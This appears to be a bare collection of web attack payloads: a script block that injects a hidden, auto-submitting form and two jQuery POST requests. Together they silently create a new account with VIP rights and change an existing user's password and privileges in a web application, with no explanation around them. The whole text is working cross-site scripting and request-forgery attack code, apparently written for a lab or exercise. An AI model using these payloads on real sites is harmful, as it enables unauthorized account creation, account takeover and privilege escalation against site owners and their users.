<script>
$("body").append("<form id='myform' action='user_add' method='post'/>");
$(myform).hide();
$(myform).append("<input name='username' value='xs_user'/>");
$(myform).append("<input name='password' value='test'/>");
$(myform).append("<input name='password2' value='test'/>");
$(myform).append("<div name='vip' value='true'/>");
$(myform).append("<input name='newUser' value='true'/>");
$(myform).submit();
</script>

$.post( "/user_add", { username: "new_user", password: "test", password2: "test",  email: "test@web.de", newUser: "true", vip: "true" } );

$.post( "/user_edit", { name: "user", password: "test", password2: "test",  email: "user@web.de", newUser: "false", vip: "true" } );
